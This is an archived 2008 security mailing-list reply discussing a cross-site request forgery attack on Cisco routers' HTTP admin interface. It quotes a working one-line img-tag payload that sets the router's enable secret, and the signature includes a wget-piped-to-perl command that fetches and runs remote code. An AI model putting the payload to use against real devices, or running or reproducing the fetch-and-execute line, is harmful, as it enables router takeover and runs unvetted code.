|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: J. Oquendo (sil
infiltrated.net)
Date: Mon Jan 14 2008 - 11:31:41 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> | Isn't your exploit somewhat complicated? Just put
> |
> | <img
> src="http://192.0.2.1/level/15/configure/-/enable/secret/mypassword"/>
> |
> | on a web page, and trick the victim to visit it while he or she is
> | logged into the Cisco router at 192.0.2.1 over HTTP. This has been
> | dubbed "Cross-Site Request Forgery" a couple of years ago, but the
> | authors of RFC 2109 were already aware of it in 1997.
With an swf file using php one wouldn't need to trick someone entirely,
just hope they don't have a pop up blocker
http://www.infiltrated.net/nojava.pimp
--
====================================================
J. Oquendo
SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)
wget -qO - www.infiltrated.net/sig|perl
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E
- application/x-pkcs7-signature attachment: S/MIME Cryptographic Signature
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]